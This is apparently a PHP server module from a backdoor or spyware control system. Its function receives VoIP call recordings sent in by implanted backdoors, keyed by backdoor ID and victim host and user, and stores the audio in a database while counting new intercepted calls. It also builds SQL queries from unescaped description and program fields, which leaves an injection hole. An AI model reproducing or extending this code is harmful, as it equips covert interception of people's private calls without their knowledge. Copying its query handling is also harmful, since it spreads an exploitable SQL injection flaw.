<?php

//////////
///
///   log_voip.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_voip.add'] = array('func'   => 'log_voip_add',
                            'perm'   => AL_SERV,
                            'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_voip_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= desc
   // varchar2  <= -
   // varchar3  <= -
   // varchar4  <= -
   // int1      <= [duration(content(contentfile))]
   // int2      <= [sizeof(content(contentfile))]
   // int3      <= status
   // longtext1 <= -
   // longblob1 <= [content(contentfile)]

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`int1`, ";
   $sql .=                    "`int2`, ";
   $sql .=                    "`int3`, ";
   $sql .=                    "`longblob1`) ";
   $sql .= "VALUES ('$backdoor_id', 'VOIP', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      clearstatcache();

      if(!(isset($log['contentfile']) && isset($_SESSION['upload'][$log['contentfile']]))) {
         return error('session', 'nosuchupload');
      }

      do {
         $sql  = "SELECT `log_id`, ";
         $sql .=        "`tag` ";
         $sql .= "FROM `log` ";
         $sql .= "WHERE (`backdoor_id` = '$backdoor_id') AND ";
         $sql .=       "(`type` = 'VOIP') AND ";
         $sql .=       "(`remotehost` = '$remotehost') AND ";
         $sql .=       "(`remoteuser` = '$remoteuser') AND ";
         $sql .=       "(`acquired` = '".str_replace(':', '', $log['acquired']->scalar)."') AND ";
         $sql .=       "(`varchar1` = '".$log['desc']."') AND ";
         $sql .=       "(`varchar2` = '".$log['program']."') AND ";
         $sql .=       "(`int3` = '1')";

         $ret = db_query($sql);

         if(!is_success($ret)) {
            break;
         } else if($ret['payload'] === false) {
            $params = array(array('t' => 'i', 'v' => $log['flags']),
                            array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                            array('t' => 's', 'v' => $log['desc']),
                            array('t' => 's', 'v' => $log['program']),
                            array('t' => 'i', 'v' => filesize(sys_get_temp_dir().'/'.$log['contentfile']) * 8 / 131072),
                            array('t' => 'i', 'v' => filesize(sys_get_temp_dir().'/'.$log['contentfile'])),
                            array('t' => 'i', 'v' => $log['status']),
                            array('t' => 'b', 'v' => sys_get_temp_dir().'/'.$log['contentfile']));

            $ret = db_execute($stmt, $params);

            if(!is_success($ret)) {
               break;
            }

            $sql  = "UPDATE `stat` ";
            $sql .= "SET `voip` = `voip` + 1, ";
            $sql .=     "`voip_new` = `voip_new` + 1 ";
            $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

            $ret = db_query($sql);
         } else {
            $tag = $ret['payload'][0]->tag;

            $sql  = "UPDATE `log` ";
            $sql .= "SET `tag` = NULL, ";
            $sql .=     "`received` = UTC_TIMESTAMP(), ";
            $sql .=     "`flags` = ?, ";
            $sql .=     "`int1` = ?, ";
            $sql .=     "`int2` = ?, ";
            $sql .=     "`int3` = ?, ";
            $sql .=     "`longblob1` = ? ";
            $sql .= "WHERE `log_id` = '".$ret['payload'][0]->log_id."'";

            $ret = db_prepare($sql);

            if(!is_success($ret)) {
               break;
            }

            $params = array(array('t' => 'i', 'v' => $log['flags']),
                            array('t' => 'i', 'v' => filesize(sys_get_temp_dir().'/'.$log['contentfile']) * 8 / 131072),
                            array('t' => 'i', 'v' => filesize(sys_get_temp_dir().'/'.$log['contentfile'])),
                            array('t' => 'i', 'v' => $log['status']),
                            array('t' => 'b', 'v' => sys_get_temp_dir().'/'.$log['contentfile']));

            $ret = db_execute($ret['payload'], $params);

            if(!is_success($ret)) {
               break;
            }

            if($tag) {
               $sql  = "UPDATE `stat` ";
               $sql .= "SET `voip_new` = `voip_new` + 1 ";
               $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

               $ret = db_query($sql);
            }
         }
      } while(0);

      unlink(sys_get_temp_dir().'/'.$log['contentfile']);
      unset($_SESSION['upload'][$log['contentfile']]);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
